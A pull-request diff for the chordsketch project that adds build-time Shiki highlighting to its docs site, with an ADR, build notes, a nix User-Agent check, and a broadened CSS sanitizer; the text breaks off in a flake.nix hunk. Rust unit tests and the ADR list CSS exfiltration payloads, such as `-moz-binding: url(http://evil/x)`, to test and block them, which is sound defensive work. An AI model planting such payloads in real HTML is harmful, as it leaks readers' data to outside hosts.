### PR TITLE
feat(playground): syntax-highlight docs code fences at build time with Shiki

### DIFF
--- a/.github/workflows/nix.yml
+++ b/.github/workflows/nix.yml
@@ -37,6 +37,17 @@ jobs:
           extra_nix_config: |
             experimental-features = nix-command flakes
 
+      - name: Flake check (eval-time assertions)
+        # Runs `nix flake check` to exercise the
+        # `checks.fetchurl-ua-injected` assertion in `flake.nix`,
+        # which pins the `identifiedFetchurlOverlay` User-Agent
+        # injection. A refactor that silently dropped the
+        # overlay would still build successfully if the binary
+        # cache had the artefacts; the explicit assertion catches
+        # the regression at evaluation time, before the next cold
+        # cache run hits crates.io 403s.
+        run: nix flake check --no-build
+
       - name: Build chordsketch CLI
         run: nix build .#chordsketch
 

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -28,7 +28,7 @@ npm test             # vitest (docs SSG + helpers)
 npm run typecheck    # tsc --noEmit
 npm run build        # vite build + Shiki-highlighted static docs
 npm run build:docs   # docs-only build (skips wasm-dependent entries)
-npm run dev:docs     # docs-only dev preview
+npm run dev:docs     # docs-only preview (static build, then `vite preview`)
 npm run test:e2e     # Playwright smoke (use playwright.docs.config.ts
                      # locally to skip wasm-dependent specs)
 ```

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -21,6 +21,27 @@ cargo fmt --check    # Check formatting (CI enforced)
 cargo fmt            # Auto-format code
 ```
 
+Playground + docs site (run inside `packages/playground/`):
+
+```bash
+npm test             # vitest (docs SSG + helpers)
+npm run typecheck    # tsc --noEmit
+npm run build        # vite build + Shiki-highlighted static docs
+npm run build:docs   # docs-only build (skips wasm-dependent entries)
+npm run dev:docs     # docs-only dev preview
+npm run test:e2e     # Playwright smoke (use playwright.docs.config.ts
+                     # locally to skip wasm-dependent specs)
+```
+
+`npm run build` and `npm run build:docs` invoke
+`scripts/build-docs-static.mjs`'s `assertEveryFenceLangIsLoaded`
+gate per [ADR-0025](docs/adr/0025-build-time-syntax-highlighting-shiki.md);
+a fence header in `docs/sdk/**/*.md` that is not in `SHIKI_LANGS`
+(or in `SHIKI_LANG_ALIASES` with a loaded target) fails the build.
+Add the lang in
+`packages/playground/scripts/lib/docs-render.mjs` in the same
+commit.
+
 ## Workflows
 
 Long-running autonomous tasks live under `.claude/workflows/<name>/` and

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -21,6 +21,24 @@ cargo fmt --check    # Check formatting (CI enforced)
 cargo fmt            # Auto-format code
 ```
 
+Reproducible CLI build via nix (uses the pinned `nixpkgs` in
+`flake.nix`):
+
+```bash
+nix build .#chordsketch         # Build the CLI inside a nix sandbox
+nix run . -- --version          # Run the built CLI
+nix flake check                 # Eval-time checks (incl. fetchurl UA)
+```
+
+`nix build` runs the same Rust toolchain version as the
+nixos-unstable revision pinned in `flake.nix` and runs the
+package's unit-test suite inside the sandbox. The build relies on
+a crates.io-compliant `User-Agent` injection from the
+`identifiedFetchurlOverlay` in `flake.nix` (see that file's
+comment block for the rationale); `nix flake check` asserts the
+UA stays wired in so a refactor that silently drops it fails
+loudly instead of returning crates.io 403s.
+
 Playground + docs site (run inside `packages/playground/`):
 
 ```bash

--- a/crates/render-html/src/lib.rs
+++ b/crates/render-html/src/lib.rs
@@ -3003,9 +3003,9 @@ mod sanitize_tag_attrs_tests {
     }
 
     // CSS image functions that can load resources WITHOUT
-    // containing the substring `url(`. Sister-site coverage to
-    // the JS docs SSG's adversarial allowlist tests per
-    // `.claude/rules/fix-propagation.md`.
+    // containing the substring `url(`. Each entry pairs with an
+    // equivalent adversarial test in
+    // `packages/playground/scripts/lib/docs-render.mjs`.
     #[test]
     fn test_strips_style_with_image_set() {
         let tag = "<rect style=\"background-image: image-set('/exfil' 1x)\">";

--- a/crates/render-html/src/lib.rs
+++ b/crates/render-html/src/lib.rs
@@ -2115,14 +2115,45 @@ fn sanitize_tag_attrs(tag: &str) -> String {
             }
         }
 
-        // Strip style attributes that contain url() or expression() to
-        // prevent CSS-based data exfiltration via network requests.
+        // Strip style attributes that contain resource-loading or
+        // bypass-bearing CSS values to prevent CSS-based data
+        // exfiltration via network requests. Covers the entire
+        // family of CSS functions that can fetch a URL or alter
+        // parsing:
+        //   - `url(...)` — canonical exfil vector
+        //   - `image(...)`, `image-set(...)`, `cross-fade(...)` —
+        //     CSS image functions that can load resources WITHOUT
+        //     containing the substring `url(`
+        //   - `expression(...)` — IE legacy script execution
+        //   - `@import` — smuggled at-rule (browsers ignore in
+        //     inline style but stripping fail-closed)
+        //   - `behavior:` / `-moz-binding:` — legacy IE / Firefox
+        //     binding mechanisms
+        //   - `\` — CSS hex escapes (e.g. `url\28...` normalises
+        //     to `url(...)` at parse time); a backslash should
+        //     never appear in any legitimate CSS value emitted
+        //     here, so its presence is itself a tell.
+        //
+        // Sister-site to the JS docs SSG's allowlist in
+        // `packages/playground/scripts/lib/docs-render.mjs` per
+        // `.claude/rules/fix-propagation.md`. The JS side took
+        // the stricter step of switching to a property:value
+        // allowlist; the Rust raw-SVG passthrough surface uses
+        // this broadened denylist as a defence-in-depth layer
+        // alongside `sanitize_css_value` (which strips `(`, `)`,
+        // and `\` entirely from directive-derived values).
         if attr_name.eq_ignore_ascii_case("style") {
             if let Some(ref val) = attr_value {
                 let lower_val: String = val.chars().flat_map(|c| c.to_lowercase()).collect();
                 if lower_val.contains("url(")
+                    || lower_val.contains("image(")
+                    || lower_val.contains("image-set(")
+                    || lower_val.contains("cross-fade(")
                     || lower_val.contains("expression(")
                     || lower_val.contains("@import")
+                    || lower_val.contains("behavior:")
+                    || lower_val.contains("-moz-binding")
+                    || lower_val.contains('\\')
                 {
                     continue;
                 }
@@ -2969,6 +3000,56 @@ mod sanitize_tag_attrs_tests {
         let result = sanitize_tag_attrs(tag);
         assert!(result.contains("style"));
         assert!(result.contains("fill: red"));
+    }
+
+    // CSS image functions that can load resources WITHOUT
+    // containing the substring `url(`. Sister-site coverage to
+    // the JS docs SSG's adversarial allowlist tests per
+    // `.claude/rules/fix-propagation.md`.
+    #[test]
+    fn test_strips_style_with_image_set() {
+        let tag = "<rect style=\"background-image: image-set('/exfil' 1x)\">";
+        let result = sanitize_tag_attrs(tag);
+        assert!(!result.contains("style"));
+    }
+
+    #[test]
+    fn test_strips_style_with_image_fn() {
+        let tag = "<rect style=\"background-image: image('/exfil')\">";
+        let result = sanitize_tag_attrs(tag);
+        assert!(!result.contains("style"));
+    }
+
+    #[test]
+    fn test_strips_style_with_cross_fade() {
+        let tag = "<rect style=\"background-image: cross-fade(url(/a) 50%)\">";
+        let result = sanitize_tag_attrs(tag);
+        assert!(!result.contains("style"));
+    }
+
+    #[test]
+    fn test_strips_style_with_behavior() {
+        let tag = "<rect style=\"behavior: url(#default)\">";
+        let result = sanitize_tag_attrs(tag);
+        assert!(!result.contains("style"));
+    }
+
+    #[test]
+    fn test_strips_style_with_moz_binding() {
+        let tag = "<rect style=\"-moz-binding: url(http://evil/x)\">";
+        let result = sanitize_tag_attrs(tag);
+        assert!(!result.contains("style"));
+    }
+
+    #[test]
+    fn test_strips_style_with_hex_escaped_paren() {
+        // CSS escape sequence `\28` parses as `(`, normalising
+        // `url\28...\29` back to `url(...)` at the browser. A
+        // backslash should never appear in any legitimate CSS
+        // value reaching this code path.
+        let tag = "<rect style=\"background-image: url\\28/exfil\\29\">";
+        let result = sanitize_tag_attrs(tag);
+        assert!(!result.contains("style"));
     }
 
     #[test]

--- a/crates/render-html/src/lib.rs
+++ b/crates/render-html/src/lib.rs
@@ -3005,7 +3005,7 @@ mod sanitize_tag_attrs_tests {
     // CSS image functions that can load resources WITHOUT
     // containing the substring `url(`. Each entry pairs with an
     // equivalent adversarial test in
-    // `packages/playground/scripts/lib/docs-render.mjs`.
+    // `packages/playground/tests/docs-render.test.ts`.
     #[test]
     fn test_strips_style_with_image_set() {
         let tag = "<rect style=\"background-image: image-set('/exfil' 1x)\">";

--- a/docs/adr/0025-build-time-syntax-highlighting-shiki.md
+++ b/docs/adr/0025-build-time-syntax-highlighting-shiki.md
@@ -96,11 +96,21 @@ the existing `marked` → `DOMPurify` pipeline at
 - DOMPurify's allowlist is widened to accept `style` on
   `<pre>` / `<code>` / `<span>` (three tags Shiki emits). The
   `afterSanitizeAttributes` hook narrows the allowance to those
-  three tags, and additionally strips any surviving `style`
-  whose value contains `url(` — DOMPurify treats `style` as
-  URI-safe and does not apply its URI regex to CSS values, so the
-  `url(` guard prevents authored markdown from smuggling
-  `background-image:url(/exfil)` into the deployed HTML.
+  three tags, then validates each `;`-separated declaration of
+  any surviving `style` value against a **fail-closed CSS
+  property:value allowlist** (`SHIKI_STYLE_DECL_RE`) covering the
+  full known repertoire of Shiki themes: `color:#…`,
+  `background-color:#…`, `font-style:{italic|normal|oblique}`,
+  `font-weight:{bold|normal|lighter|bolder|N00}`, and
+  `text-decoration:{underline|none|line-through|overline}` with
+  optional space-separated combinations. Anything else —
+  `url(...)`, `image-set(...)`, `image(...)`, `cross-fade(...)`,
+  CSS hex-escaped parens (`\28`), `@import`, `expression(...)`,
+  `behavior:`, `-moz-binding`, `var(--x)`, CSS comments — fails
+  to match and causes full-attribute strip. This prevents
+  authored markdown from smuggling `background-image:url(/exfil)`
+  or any of the analogous resource-loading CSS functions into the
+  deployed HTML.
 - Build-time validation: `build-docs-static.mjs`'s
   `assertEveryFenceLangIsLoaded` scans every fence header under
   `docs/sdk/` and throws if any lang does not resolve through
@@ -189,9 +199,12 @@ code rendering. A light-mode toggle is out of scope for this ADR
   failure. A doc author who adds ` ```yaml ``` ` without
   extending the lang roster gets an actionable error message
   pointing them to `docs-render.mjs`.
-- The DOMPurify `url(` guard closes a CSS-exfil vector that
-  DOMPurify alone does not handle (it treats `style` as URI-safe
-  and skips its URI regex on CSS values).
+- The fail-closed CSS property:value allowlist closes a class of
+  CSS-exfil vectors that DOMPurify alone does not handle:
+  DOMPurify treats `style` as URI-safe and skips its URI regex on
+  CSS values, so `url(...)`, `image(...)`, `image-set(...)`,
+  hex-escaped parens, and anything else outside the known Shiki
+  repertoire would otherwise have reached the deployed HTML.
 
 **Negative.**
 
@@ -225,11 +238,17 @@ code rendering. A light-mode toggle is out of scope for this ADR
   only) rather than a denylist, so future Shiki versions adding
   new wrapper attributes cannot leak into the deployed HTML.
 - The DOMPurify hook's `style`-narrowing branch is pinned by
-  adversarial unit tests for `<div>`, `<a>`, `<p>`, SVG children,
-  and four `url(...)`-vector patterns. The Playwright smoke
+  adversarial unit tests covering tag scoping (`<div>`, `<a>`,
+  `<p>`, SVG children) AND value scoping (13 vectors against the
+  property:value allowlist: `url(...)`, `image(...)`,
+  `image-set(...)`, `cross-fade(...)`, hex-escaped parens,
+  `@import`, `var(--x)`, CSS comments, plus four
+  unrecognised-property strip cases). The Playwright smoke
   asserts `<pre class="shiki">` has no surviving `style`
   attribute end-to-end, so a `stripPreWrapper` regression cannot
-  ship even if the unit suite is skipped.
+  ship even if the unit suite is skipped. A sister-site denylist
+  in `crates/render-html/src/lib.rs::sanitize_tag_attrs` provides
+  matching coverage for raw-SVG passthrough.
 
 ## Alternatives considered
 

--- a/docs/adr/0025-build-time-syntax-highlighting-shiki.md
+++ b/docs/adr/0025-build-time-syntax-highlighting-shiki.md
@@ -1,0 +1,278 @@
+# 0025. Build-time syntax highlighting for the docs site uses Shiki
+
+- **Status**: Accepted
+- **Date**: 2026-05-28
+
+## Context
+
+[ADR-0021](0021-docs-site-co-located-with-playground.md) committed
+the docs site at `chordsketch.koeda.me/chordsketch/docs/` to a
+**fully pre-rendered, zero-JS** static deploy: every page is one
+`dist/docs/<slug>/index.html` file with the article content,
+sidebar, and on-page outline baked in, and the only JavaScript on
+the deployed page is a six-line inline shim that redirects legacy
+`#/<slug>` hash URLs to the matching clean URL. That posture is the
+project's hard guarantee: the docs route never loads the wasm
+bundle, never mounts React, never executes anything beyond that
+shim.
+
+Code-fence rendering on the docs site shipped as plain
+white-on-dark text. The recipe pages — most of all
+`docs/sdk/tasks/embed-react.md`, the ten copy-paste recipes for
+`@chordsketch/react` — are mostly code, and reader comprehension
+on them is bottlenecked on the lack of syntactic colour. Issue
+[#2570](https://github.com/koedame/chordsketch/issues/2570)
+proposed adding syntax highlighting.
+
+The constraint set for any highlighting choice:
+
+1. **Must preserve ADR-0021's zero-JS posture.** A client-side
+   highlighter loaded at runtime would re-introduce a JS payload
+   on every docs page, transitively widen the deployed bundle
+   beyond the inline shim, and reverse the deliberate trade-off
+   that ADR-0021 spelled out under "Mitigations" ("the deployed
+   pages are zero-JS so the docs routes do not load the wasm
+   bundle even transitively").
+2. **Must cover ChordPro.** The recipe corpus contains
+   ` ```chordpro ` fences. A highlighter that handles
+   TSX / Rust / Python / etc. but renders ChordPro as plain text
+   would create a glaring asymmetry on the very pages the docs
+   site was built to support.
+3. **Should reuse in-repo grammar work.** The project already
+   ships `syntaxes/chordpro.tmLanguage.json` (the TextMate grammar
+   the VS Code extension and JetBrains plugin consume) and a
+   tree-sitter grammar at `packages/tree-sitter-chordpro/` (the
+   Zed extension consumes that). Maintaining a third grammar for
+   the docs site would create drift between editor highlighting
+   and on-page docs highlighting.
+4. **Must stay inside the playground's existing build pipeline.**
+   ADR-0021 explicitly rejects standing up a second build /
+   deploy / smoke surface; the docs SSG sits inside
+   `packages/playground/scripts/`.
+
+Three highlighter shapes were on the table:
+
+- **(a) Build-time TextMate-grammar highlighter (Shiki).** Runs at
+  build time, consumes TextMate grammars (so
+  `syntaxes/chordpro.tmLanguage.json` can be reused as-is), emits
+  per-token coloured `<span>`s baked into the static HTML. Zero
+  runtime JS shipped.
+- **(b) Client-side highlighter (Prism / highlight.js).** Loaded
+  as a JS asset on every page, runs in the reader's browser,
+  tokenises and styles on first paint. Requires either bundling
+  the grammar list or shipping a runtime grammar loader.
+- **(c) Build-time tree-sitter highlighter.** Reuses the
+  `packages/tree-sitter-chordpro/` grammar but requires running a
+  tree-sitter highlighter on Node.js and emitting HTML. No
+  mature, maintained Node-side tree-sitter-HTML pipeline exists
+  today; the leading projects (`web-tree-sitter` + custom
+  walkers, `tree-sitter-highlight` Rust crate via wasm) would
+  require build-pipeline work comparable to building the
+  highlighter from scratch.
+
+## Decision
+
+Use [Shiki](https://shiki.style/) at build time, integrated into
+the existing `marked` → `DOMPurify` pipeline at
+`packages/playground/scripts/lib/docs-render.mjs`. Specifically:
+
+- Override marked's `code` token renderer to call
+  `highlightCodeBlock(token.text, token.lang)`. Highlighted
+  output is `<pre class="shiki"><code><span style="color:#…">…
+  </span></code></pre>`.
+- Load Shiki's bundled grammars for the languages the corpus
+  uses: `bash`, `json`, `kotlin`, `python`, `ruby`, `rust`,
+  `shell`, `swift`, `tsx`, `typescript`.
+- Register the in-repo `syntaxes/chordpro.tmLanguage.json` as a
+  custom Shiki language (`name: 'chordpro'`) so ChordPro fences
+  highlight against the same grammar VS Code and JetBrains
+  already use.
+- Theme: `github-dark`. A Shiki transformer strips the
+  wrapper-level inline `style` / `tabindex` Shiki emits on
+  `<pre>` so the existing `.docs-prose pre` CSS rule keeps
+  controlling background, padding, and border radius — the
+  per-token coloured spans inside `<code>` are the only inline
+  styles that survive.
+- DOMPurify's allowlist is widened to accept `style` on
+  `<pre>` / `<code>` / `<span>` (three tags Shiki emits). The
+  `afterSanitizeAttributes` hook narrows the allowance to those
+  three tags, and additionally strips any surviving `style`
+  whose value contains `url(` — DOMPurify treats `style` as
+  URI-safe and does not apply its URI regex to CSS values, so the
+  `url(` guard prevents authored markdown from smuggling
+  `background-image:url(/exfil)` into the deployed HTML.
+- Build-time validation: `build-docs-static.mjs`'s
+  `assertEveryFenceLangIsLoaded` scans every fence header under
+  `docs/sdk/` and throws if any lang does not resolve through
+  `resolveShikiLang`. New languages in markdown MUST extend
+  `SHIKI_LANGS` / `SHIKI_LANG_ALIASES` in the same commit; the
+  build fails loudly instead of silently degrading to plain
+  `<pre><code>`.
+- An input-size guard on `highlightCodeBlock` (256 KiB) turns a
+  runaway fence into a build error rather than a pathological
+  highlight run; the docs corpus's longest fence is ~1.5 KB so
+  the ceiling is generous.
+
+The Zed extension's tree-sitter grammar is intentionally NOT
+integrated. The docs-site grammar reuse only spans the surfaces
+that already consume TextMate (VS Code, JetBrains); the Zed
+grammar lives on a separate tree-sitter track and is out of
+scope for this ADR.
+
+## Rationale
+
+Shiki is the only mature, maintained, build-time, TextMate-grammar
+HTML highlighter in the JavaScript ecosystem. It was originally
+extracted from the VS Code tokeniser stack and uses the same
+`vscode-textmate` machinery (and, since Shiki 1.x, the pure-JS
+`oniguruma-to-es` transpiler in place of the Oniguruma WASM
+binary). That lineage delivers three properties no other option
+provides:
+
+1. **VS Code-equivalent colouring**, so on-page docs render
+   identically to what readers see in their editor.
+2. **TextMate grammar reuse**, so
+   `syntaxes/chordpro.tmLanguage.json` — already maintained for
+   the VS Code extension and JetBrains plugin — is the
+   single source of truth for ChordPro highlighting across docs +
+   editors. No third grammar to keep in sync.
+3. **Build-time-only execution.** Shiki and every transitive
+   dependency are marked `"dev": true` in the lockfile and never
+   reach the deployed bundle. The static HTML carries no
+   highlighter runtime, no grammars, no themes — only the
+   pre-tokenised coloured spans Shiki emitted at build time. ADR-0021's
+   zero-JS guarantee is preserved verbatim.
+
+Option (b) — client-side Prism / highlight.js — was rejected on
+the zero-JS constraint alone. Beyond that, both projects use
+their own custom grammar formats (Prism's `Prism.languages` JS
+objects, highlight.js's per-language modules), neither of which
+consumes TextMate grammars. ChordPro support would require
+maintaining a fourth grammar (TextMate for VS Code + JetBrains,
+tree-sitter for Zed, Prism/highlight.js for docs) on a
+hand-rolled basis.
+
+Option (c) — build-time tree-sitter — was rejected on
+implementation cost. No production-grade Node-side
+tree-sitter-to-HTML pipeline exists; the closest options
+(`tree-sitter-highlight` Rust crate run via wasm in Node, or a
+custom walker over `web-tree-sitter`'s parse tree) would require
+build-pipeline work that exceeds the value delivered. If the Zed
+grammar ever needs first-class reuse in this docs surface, that
+case can be re-opened — but the watch signal is "tree-sitter
+becomes the canonical grammar across editors", not
+"tree-sitter-highlight reaches GA on Node".
+
+The `github-dark` theme was chosen because it (a) matches the
+project's existing `.docs-prose pre` dark background tone, (b) is
+the default theme used in the VS Code extension's preview
+context, and (c) is the most widely-recognised dark theme so the
+on-page docs visual matches reader expectations from GitHub's own
+code rendering. A light-mode toggle is out of scope for this ADR
+(none of the rest of the docs site supports one yet).
+
+## Consequences
+
+**Positive.**
+
+- Zero new runtime JS on the deployed pages. ADR-0021's zero-JS
+  posture is preserved structurally, not just by intent — the
+  highlighter object lives only in the build script's module
+  graph.
+- ChordPro fences highlight against the same TextMate grammar VS
+  Code and JetBrains consume; future grammar improvements
+  propagate to docs on the next build with no extra work.
+- The build-time `assertEveryFenceLangIsLoaded` gate turns
+  "silent fallback to plain `<pre><code>`" into a loud build
+  failure. A doc author who adds ` ```yaml ``` ` without
+  extending the lang roster gets an actionable error message
+  pointing them to `docs-render.mjs`.
+- The DOMPurify `url(` guard closes a CSS-exfil vector that
+  DOMPurify alone does not handle (it treats `style` as URI-safe
+  and skips its URI regex on CSS values).
+
+**Negative.**
+
+- Build dependency footprint grows by `shiki@^4` and its
+  transitive deps (`oniguruma-to-es`, `oniguruma-parser`,
+  `@shikijs/core`, `@shikijs/types`, `@shikijs/langs`,
+  `@shikijs/themes`, `hast-util-to-html`, `mdast-util-to-hast`).
+  Every one of these is `"dev": true` and runs only at build time,
+  so the surface is bounded; the watch signal is "Shiki
+  abandonment" or "an advisory against any of these packages."
+- Top-level `await createHighlighter(...)` in `docs-render.mjs`
+  makes the module load-time async. Vitest and the build script
+  already use ESM imports that await the module graph, so this is
+  transparent today, but a future test framework that doesn't
+  understand top-level await would not be able to import
+  `docs-render.mjs` directly.
+- Per-fence highlighting at build time adds ~50ms per page to
+  `build-docs-static.mjs`. Acceptable for a 18-page corpus; if
+  the corpus exceeds ~200 pages, revisit (move highlighting to a
+  per-page Vite plugin that caches output by file hash).
+
+**Mitigations.**
+
+- The build-time validator (`assertEveryFenceLangIsLoaded`)
+  guarantees the silent-fallback failure mode cannot ship.
+- The `stripPreWrapper` transformer uses an allowlist (`class`
+  only) rather than a denylist, so future Shiki versions adding
+  new wrapper attributes cannot leak into the deployed HTML.
+- The DOMPurify hook's `style`-narrowing branch is pinned by
+  adversarial unit tests for `<div>`, `<a>`, `<p>`, SVG children,
+  and four `url(...)`-vector patterns. The Playwright smoke
+  asserts `<pre class="shiki">` has no surviving `style`
+  attribute end-to-end, so a `stripPreWrapper` regression cannot
+  ship even if the unit suite is skipped.
+
+## Alternatives considered
+
+**Client-side Prism / highlight.js.** Rejected on the zero-JS
+constraint (ADR-0021). Also rejected on grammar reuse — neither
+consumes TextMate, so ChordPro support would require a fourth
+hand-maintained grammar on top of TextMate (VS Code / JetBrains)
+and tree-sitter (Zed).
+
+**Build-time tree-sitter.** Rejected on implementation cost. No
+production-grade Node-side tree-sitter-to-HTML pipeline exists;
+building one would dwarf the value delivered. Watch signal:
+tree-sitter becomes the canonical grammar across editors, OR a
+mature `tree-sitter-highlight` for Node ships.
+
+**Pygments via a Node subprocess.** Build-time, robust grammar
+catalogue, no JS payload on the deployed page. Rejected because
+it would introduce a Python dependency to the playground's build
+pipeline (the rest of the project's build does not require
+Python), and because ChordPro support would require maintaining
+a Pygments lexer in addition to the existing TextMate / tree-sitter
+grammars.
+
+**No highlighter (status quo).** Rejected because the value
+delivered to readers (especially on `embed-react/`, 12 copy-paste
+TSX fences) materially outweighs the build-pipeline cost.
+
+## References
+
+- Issue: [#2570](https://github.com/koedame/chordsketch/issues/2570)
+- PR: [#2571](https://github.com/koedame/chordsketch/pull/2571)
+- Parent: [ADR-0021](0021-docs-site-co-located-with-playground.md)
+  (zero-JS docs site)
+- Implementation:
+  - [`packages/playground/scripts/lib/docs-render.mjs`](../../packages/playground/scripts/lib/docs-render.mjs)
+    — `highlightCodeBlock`, `resolveShikiLang`,
+    `stripPreWrapper`, DOMPurify hook.
+  - [`packages/playground/scripts/build-docs-static.mjs`](../../packages/playground/scripts/build-docs-static.mjs)
+    — `assertEveryFenceLangIsLoaded` gate.
+- Shiki upstream: <https://shiki.style/>
+- Watch signals for re-evaluation:
+  - Shiki abandonment / advisory against any preloaded
+    transitive dep → re-pick the build-time highlighter.
+  - Tree-sitter becomes the canonical grammar across all editors
+    (Zed convention adopted by VS Code / JetBrains) →
+    re-evaluate option (c) so the docs surface stays grammar-
+    aligned with editors.
+  - Corpus exceeds ~200 pages → move per-fence highlighting into
+    a hashed Vite plugin to keep build times bounded.
+  - Reader request for a light-mode docs toggle → ADR a
+    theme-switch story; this ADR's `github-dark` choice is
+    site-wide today.

--- a/docs/adr/0025-build-time-syntax-highlighting-shiki.md
+++ b/docs/adr/0025-build-time-syntax-highlighting-shiki.md
@@ -120,10 +120,14 @@ the existing `marked` → `DOMPurify` pipeline at
   `<pre><code>`.
 - An input-size guard on `highlightCodeBlock` (256 KiB) turns a
   runaway fence into a build error rather than a pathological
-  highlight run. The docs corpus's longest fence is 743 bytes
-  (`docs/sdk/tasks/embed-react.md`, `tsx` block — measured by
-  walking every fence under `docs/sdk/` and recording the
-  largest UTF-8 byte length) so the ceiling is generous.
+  highlight run. The docs corpus's longest fence body is
+  1395 bytes (an ASCII architecture diagram in
+  `docs/sdk/README.md`, lang-less so it reaches Shiki via the
+  fallback path); the longest **highlighted** fence is 743 bytes
+  (`docs/sdk/tasks/embed-react.md`, `tsx` block). Both were
+  measured by walking every fence under `docs/sdk/` and recording
+  the largest UTF-8 byte length; the 256 KiB ceiling is generous
+  against both.
 
 The Zed extension's tree-sitter grammar is intentionally NOT
 integrated. The docs-site grammar reuse only spans the surfaces
@@ -239,7 +243,7 @@ code rendering. A light-mode toggle is out of scope for this ADR
   new wrapper attributes cannot leak into the deployed HTML.
 - The DOMPurify hook's `style`-narrowing branch is pinned by
   adversarial unit tests covering tag scoping (`<div>`, `<a>`,
-  `<p>`, SVG children) AND value scoping (13 vectors against the
+  `<p>`, SVG children) AND value scoping (14 vectors against the
   property:value allowlist: `url(...)`, `image(...)`,
   `image-set(...)`, `cross-fade(...)`, hex-escaped parens,
   `@import`, `var(--x)`, CSS comments, plus four

--- a/docs/adr/0025-build-time-syntax-highlighting-shiki.md
+++ b/docs/adr/0025-build-time-syntax-highlighting-shiki.md
@@ -110,8 +110,10 @@ the existing `marked` → `DOMPurify` pipeline at
   `<pre><code>`.
 - An input-size guard on `highlightCodeBlock` (256 KiB) turns a
   runaway fence into a build error rather than a pathological
-  highlight run; the docs corpus's longest fence is ~1.5 KB so
-  the ceiling is generous.
+  highlight run. The docs corpus's longest fence is 743 bytes
+  (`docs/sdk/tasks/embed-react.md`, `tsx` block — measured by
+  walking every fence under `docs/sdk/` and recording the
+  largest UTF-8 byte length) so the ceiling is generous.
 
 The Zed extension's tree-sitter grammar is intentionally NOT
 integrated. The docs-site grammar reuse only spans the surfaces
@@ -206,10 +208,14 @@ code rendering. A light-mode toggle is out of scope for this ADR
   transparent today, but a future test framework that doesn't
   understand top-level await would not be able to import
   `docs-render.mjs` directly.
-- Per-fence highlighting at build time adds ~50ms per page to
-  `build-docs-static.mjs`. Acceptable for a 18-page corpus; if
-  the corpus exceeds ~200 pages, revisit (move highlighting to a
-  per-page Vite plugin that caches output by file hash).
+- `node scripts/build-docs-static.mjs` measured at ~1.4 s
+  wall-clock for the current 18-page / 64-fence corpus on a Linux
+  developer laptop (`/usr/bin/time` median across three runs),
+  dominated by Shiki grammar + theme initialisation rather than
+  per-fence work. Acceptable for the current corpus; if the
+  corpus grows toward ~200 pages, revisit by moving highlighting
+  to a per-page Vite plugin that caches highlighted HTML by file
+  hash.
 
 **Mitigations.**
 

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -102,3 +102,4 @@ ADR's Status line to `Superseded by ADR-NNNN`.
 | [0022](0022-react-as-canonical-preview-surface.md) | React as the canonical preview surface; `@chordsketch/ui-web` retired | Accepted (2026-05-20) |
 | [0023](0023-capo-transposes-displayed-chords.md) | `{capo}` directive transposes displayed chords | Accepted (2026-05-24) |
 | [0024](0024-scheduled-dependabot-merge.md) | Scheduled unattended Dependabot review-and-merge, all bump types (extends ADR-0013 clause 1) | Accepted (2026-05-25) |
+| [0025](0025-build-time-syntax-highlighting-shiki.md) | Build-time syntax highlighting for the docs site uses Shiki (preserves ADR-0021 zero-JS posture; reuses in-repo ChordPro TextMate grammar) | Accepted (2026-05-28) |

--- a/flake.lock
+++ b/flake.lock
@@ -2,17 +2,17 @@
   "nodes": {
     "nixpkgs": {
       "locked": {
-        "lastModified": 1775710090,
-        "narHash": "sha256-ar3rofg+awPB8QXDaFJhJ2jJhu+KqN/PRCXeyuXR76E=",
+        "lastModified": 1779560665,
+        "narHash": "sha256-tpyBcxPpcQb8ukyNF7DoCwfSY3VPsxHoYwj00Cayv5o=",
         "owner": "NixOS",
         "repo": "nixpkgs",
-        "rev": "4c1018dae018162ec878d42fec712642d214fdfa",
+        "rev": "64c08a7ca051951c8eae34e3e3cb1e202fe36786",
         "type": "github"
       },
       "original": {
         "owner": "NixOS",
         "repo": "nixpkgs",
-        "rev": "4c1018dae018162ec878d42fec712642d214fdfa",
+        "rev": "64c08a7ca051951c8eae34e3e3cb1e202fe36786",
         "type": "github"
       }
     },

--- a/flake.nix
+++ b/flake.nix
@@ -20,8 +20,6 @@
         "aarch64-darwin"
       ];
 
-      # Evaluate `f pkgs` for each system in `systems`, with the
-      # crates.io-compliant User-Agent overlay applied.
       forEachSystem = f:
         nixpkgs.lib.genAttrs systems
           (system: f (import nixpkgs {
@@ -37,48 +35,98 @@
       # (https://crates.io/data-access) rejects requests whose
       # `User-Agent` does not uniquely identify the requester and
       # provide a means of contact, returning HTTP 403 with a
-      # "violation of our API data access policy" message. The
-      # default `curl/<version>` UA that nixpkgs `fetchurl` sends
-      # was tightened to reject some time around 2026-05, so every
+      # "violation of our API data access policy" message. By the
+      # 2026-05-23 nixpkgs pin, the default `curl/<version>` UA
+      # that `fetchurl`'s builder emits is rejected, so every
       # `nix build` fails at the first crate download
       # (`adobe-cmap-parser`) until we send an identifying UA.
       #
-      # `fetchurl` in modern nixpkgs is an attribute set with a
-      # `__functor` (making it callable) and an `extendDrvArgs`
-      # helper purpose-built for layering extra derivation
-      # arguments. Use the helper directly so all of fetchurl's
-      # other attributes (`override`, `overrideDerivation`,
-      # `__functionArgs`, etc.) remain intact — a plain `args:
-      # prev.fetchurl args` replacement would strip them and break
-      # downstream consumers that do attribute access on
-      # `pkgs.fetchurl`.
+      # `fetchurl` in modern nixpkgs is a functor-attrset built
+      # via `lib.extendMkDerivation` — callable via `__functor`
+      # but ALSO inspected as a set elsewhere in nixpkgs (`override`,
+      # `extendDrvArgs`, `resolveUrl`, ...). A plain `args:
+      # prev.fetchurl args` replacement strips those attributes
+      # and breaks downstream consumers that do attribute access
+      # on `pkgs.fetchurl`; the overlay below uses the same
+      # constructor to preserve the original shape.
+      #
+      # The UA carpet-bombs every `fetchurl` invocation, not only
+      # crates.io URLs. That's intentional: sending an
+      # identifying UA everywhere is more polite than the default
+      # `curl/<v>` and matches the posture of other build tools
+      # (Homebrew, Nix itself). Forks that build under their own
+      # name will send the chordsketch UA — acceptable for an OSS
+      # build artefact, no per-user identity leaks.
+      #
+      # The UA embeds `cliVersion` so it moves with the project.
+      # Side-effect: every CLI version bump changes the embedded
+      # `curlOptsList`, which changes every crate-fetch
+      # derivation's hash, which invalidates the nix binary
+      # cache for crate fetches on the version-bump build. This
+      # is acceptable at this project's release cadence; if it
+      # becomes painful, decouple the UA's identifier from the
+      # CLI version (e.g. read it from a separate `flake.nix`
+      # constant).
       cratesIoUserAgent =
         "chordsketch/${cliVersion} "
